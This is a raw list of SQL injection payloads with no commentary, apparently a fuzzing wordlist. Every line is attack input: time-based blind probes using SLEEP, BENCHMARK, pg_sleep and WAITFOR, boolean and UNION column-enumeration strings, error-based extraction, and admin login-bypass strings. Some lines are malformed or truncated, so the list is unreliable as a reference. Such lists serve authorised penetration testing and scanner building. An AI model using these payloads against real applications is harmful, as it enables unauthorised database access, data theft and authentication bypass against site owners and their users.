'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
X'XOR(if(now()=sysdate(),//sleep(10)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(10)))a)
'XOR(if(now()=sysdate(),sleep(10),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
(SELECT * FROM (SELECT(SLEEP(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000,sha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
(select(0)from(select(sleep(10)))v)
'%2b(select*from(select(sleep(10)))a)%2b'
(select*from(select(sleep(10)))a)
1'%2b(select*from(select(sleep(10)))a)%2b'
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
           OR 1=1
           OR 1=0
           OR x=x
           OR x=y
           OR 1=1#
           OR 1=0#
           OR x=x#
           OR x=y#
           OR 1=1-- 
           OR 1=0-- 
           OR x=x-- 
           OR x=y-- 
           OR 3409=3409 AND ('pytW' LIKE 'pytW
           OR 3409=3409 AND ('pytW' LIKE 'pytY
           HAVING 1=1
           HAVING 1=0
           HAVING 1=1#
           HAVING 1=0#
           HAVING 1=1-- 
           HAVING 1=0-- 
           AND 1=1
           AND 1=0
           AND 1=1-- 
           AND 1=0-- 
           AND 1=1#
           AND 1=0#
           AND 1=1 AND '%'='
           AND 1=0 AND '%'='
           AND 1083=1083 AND (1427=1427
           AND 7506=9091 AND (5913=5913
           AND 1083=1083 AND ('1427=1427
           AND 7506=9091 AND ('5913=5913
           AND 7300=7300 AND 'pKlZ'='pKlZ
           AND 7300=7300 AND 'pKlZ'='pKlY
           AND 7300=7300 AND ('pKlZ'='pKlZ
           AND 7300=7300 AND ('pKlZ'='pKlY
           AS INJECTX WHERE 1=1 AND 1=1
           AS INJECTX WHERE 1=1 AND 1=0
           AS INJECTX WHERE 1=1 AND 1=1#
           AS INJECTX WHERE 1=1 AND 1=0#
           AS INJECTX WHERE 1=1 AND 1=1--
           AS INJECTX WHERE 1=1 AND 1=0--
           WHERE 1=1 AND 1=1
           WHERE 1=1 AND 1=0
           WHERE 1=1 AND 1=1#
           WHERE 1=1 AND 1=0#
           WHERE 1=1 AND 1=1--
           WHERE 1=1 AND 1=0--
           ORDER BY 1-- 
           ORDER BY 2-- 
           ORDER BY 3-- 
           ORDER BY 4-- 
           ORDER BY 5-- 
           ORDER BY 6-- 
           ORDER BY 7-- 
           ORDER BY 8-- 
           ORDER BY 9-- 
           ORDER BY 10-- 
           ORDER BY 31337-- 
           ORDER BY 1# 
           ORDER BY 2# 
           ORDER BY 3# 
           ORDER BY 4# 
           ORDER BY 5# 
           ORDER BY 6# 
           ORDER BY 7# 
           ORDER BY 8# 
           ORDER BY 9# 
           ORDER BY 10# 
           ORDER BY 31337#
           ORDER BY 1 
           ORDER BY 2 
           ORDER BY 3 
           ORDER BY 4 
           ORDER BY 5 
           ORDER BY 6 
           ORDER BY 7 
           ORDER BY 8 
           ORDER BY 9 
           ORDER BY 10 
           ORDER BY 31337 
           RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
           RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
          IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
          IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
          %' AND 8310=8310 AND '%'='
          %' AND 8310=8311 AND '%'='
           and (select substring(@@version,1,1))='X'
           and (select substring(@@version,1,1))='M'
           and (select substring(@@version,2,1))='i'
           and (select substring(@@version,2,1))='y'
           and (select substring(@@version,3,1))='c'
           and (select substring(@@version,3,1))='S'
           and (select substring(@@version,3,1))='X'
          sleep(5)#
          1 or sleep(5)#
          " or sleep(5)#
          ' or sleep(5)#
          " or sleep(5)="
          ' or sleep(5)='
          1) or sleep(5)#
          ") or sleep(5)="
          ') or sleep(5)='
          1)) or sleep(5)#
          ")) or sleep(5)="
          ')) or sleep(5)='
          ;waitfor delay '0:0:5'--
          );waitfor delay '0:0:5'--
          ';waitfor delay '0:0:5'--
          ";waitfor delay '0:0:5'--
          ');waitfor delay '0:0:5'--
          ");waitfor delay '0:0:5'--
          ));waitfor delay '0:0:5'--
          '));waitfor delay '0:0:5'--
          "));waitfor delay '0:0:5'--
          benchmark(10000000,MD5(1))#
          1 or benchmark(10000000,MD5(1))#
          " or benchmark(10000000,MD5(1))#
          ' or benchmark(10000000,MD5(1))#
          1) or benchmark(10000000,MD5(1))#
          ") or benchmark(10000000,MD5(1))#
          ') or benchmark(10000000,MD5(1))#
          1)) or benchmark(10000000,MD5(1))#
          ")) or benchmark(10000000,MD5(1))#
          ')) or benchmark(10000000,MD5(1))#
          pg_sleep(5)--
          1 or pg_sleep(5)--
          " or pg_sleep(5)--
          ' or pg_sleep(5)--
          1) or pg_sleep(5)--
          ") or pg_sleep(5)--
          ') or pg_sleep(5)--
          1)) or pg_sleep(5)--
          ")) or pg_sleep(5)--
          ')) or pg_sleep(5)--
          AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
          AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
          AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
          AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
          AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
          SLEEP(5)#
          SLEEP(5)--
          SLEEP(5)="
          SLEEP(5)='
          or SLEEP(5)
          or SLEEP(5)#
          or SLEEP(5)--
          or SLEEP(5)="
          or SLEEP(5)='
          waitfor delay '00:00:05'
          waitfor delay '00:00:05'--
          waitfor delay '00:00:05'#
          benchmark(50000000,MD5(1))
          benchmark(50000000,MD5(1))--
          benchmark(50000000,MD5(1))#
          or benchmark(50000000,MD5(1))
          or benchmark(50000000,MD5(1))--
          or benchmark(50000000,MD5(1))#
          pg_SLEEP(5)
          pg_SLEEP(5)--
          pg_SLEEP(5)#
          or pg_SLEEP(5)
          or pg_SLEEP(5)--
          or pg_SLEEP(5)#
          '\"
          AnD SLEEP(5)
          AnD SLEEP(5)--
          AnD SLEEP(5)#
          &&SLEEP(5)
          &&SLEEP(5)--
          &&SLEEP(5)#
          ' AnD SLEEP(5) ANd '1
          '&&SLEEP(5)&&'1
          ORDER BY SLEEP(5)
          ORDER BY SLEEP(5)--
          ORDER BY SLEEP(5)#
          (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
          (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
          (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
          +benchmark(3200,SHA1(1))+'
          + SLEEP(10) + '
          RANDOMBLOB(500000000/2)
          AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
          OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
          RANDOMBLOB(1000000000/2)
          AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
          OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
          SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ 
         
           ORDER BY SLEEP(5)
           ORDER BY 1,SLEEP(5)
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
           ORDER BY SLEEP(5)#
           ORDER BY 1,SLEEP(5)#
           ORDER BY 1,SLEEP(5),3#
           ORDER BY 1,SLEEP(5),3,4#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
           ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
           UNION ALL SELECT 1
           UNION ALL SELECT 1,2
           UNION ALL SELECT 1,2,3
           UNION ALL SELECT 1,2,3,4
           UNION ALL SELECT 1,2,3,4,5
           UNION ALL SELECT 1,2,3,4,5,6
           UNION ALL SELECT 1,2,3,4,5,6,7
           UNION ALL SELECT 1,2,3,4,5,6,7,8
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10
           UNION ALL SELECT 1#
           UNION ALL SELECT 1,2#
           UNION ALL SELECT 1,2,3#
           UNION ALL SELECT 1,2,3,4#
           UNION ALL SELECT 1,2,3,4,5#
           UNION ALL SELECT 1,2,3,4,5,6#
           UNION ALL SELECT 1,2,3,4,5,6,7#
           UNION ALL SELECT 1,2,3,4,5,6,7,8#
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9#
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#
           UNION ALL SELECT 1-- 
           UNION ALL SELECT 1,2-- 
           UNION ALL SELECT 1,2,3-- 
           UNION ALL SELECT 1,2,3,4-- 
           UNION ALL SELECT 1,2,3,4,5-- 
           UNION ALL SELECT 1,2,3,4,5,6-- 
           UNION ALL SELECT 1,2,3,4,5,6,7-- 
           UNION ALL SELECT 1,2,3,4,5,6,7,8-- 
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- 
           UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- 
           UNION SELECT @@VERSION,SLEEP(5),3
           UNION SELECT @@VERSION,SLEEP(5),USER(),4
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
           UNION SELECT @@VERSION,SLEEP(5),"'3
           UNION SELECT @@VERSION,SLEEP(5),"'3'"#
           UNION SELECT @@VERSION,SLEEP(5),USER(),4#
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
           UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
           UNION ALL SELECT USER()-- 
           UNION ALL SELECT SLEEP(5)-- 
           UNION ALL SELECT USER(),SLEEP(5)-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
           UNION ALL SELECT NULL-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--  
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- 
           UNION ALL SELECT NULL#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
           UNION ALL SELECT NULL 
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
           AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
           AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
           AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
           UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX'
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6

           UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 

           UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
           UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#

     '-'
     ' '
     '&'
     '^'
     '*'
     ' or ''-'
     ' or '' '
     ' or ''&'
     ' or ''^'
     ' or ''*'
     "-"
     " "
     "&"
     "^"
     "*"
     " or ""-"
     " or "" "
     " or ""&"
     " or ""^"
     " or ""*"
     or true--
     " or true--
     ' or true--
     ") or true--
     ') or true--
     ' or 'x'='x
     ') or ('x')=('x
     ')) or (('x'))=(('x
     " or "x"="x
     ") or ("x")=("x
     ")) or (("x"))=(("x
     or 1=1
     or 1=1--
     or 1=1#
     or 1=1/*
     admin' --
     admin' #
     admin'/*
     admin' or '1'='1
     admin' or '1'='1'--
     admin' or '1'='1'#
     admin' or '1'='1'/*
     admin'or 1=1 or ''='
     admin' or 1=1
     admin' or 1=1--
     admin' or 1=1#
     admin' or 1=1/*
     admin') or ('1'='1
     admin') or ('1'='1'--
     admin') or ('1'='1'#
     admin') or ('1'='1'/*
     admin') or '1'='1
     admin') or '1'='1'--
     admin') or '1'='1'#
     admin') or '1'='1'/*
     1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
     admin" --
     admin" #
     admin"/*
     admin" or "1"="1
     admin" or "1"="1"--
     admin" or "1"="1"#
     admin" or "1"="1"/*
     admin"or 1=1 or ""="
     admin" or 1=1
     admin" or 1=1--
     admin" or 1=1#
     admin" or 1=1/*
     admin") or ("1"="1
     admin") or ("1"="1"--
     admin") or ("1"="1"#
     admin") or ("1"="1"/*
     admin") or "1"="1
     admin") or "1"="1"--
     admin") or "1"="1"#
     admin") or "1"="1"/*
     1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
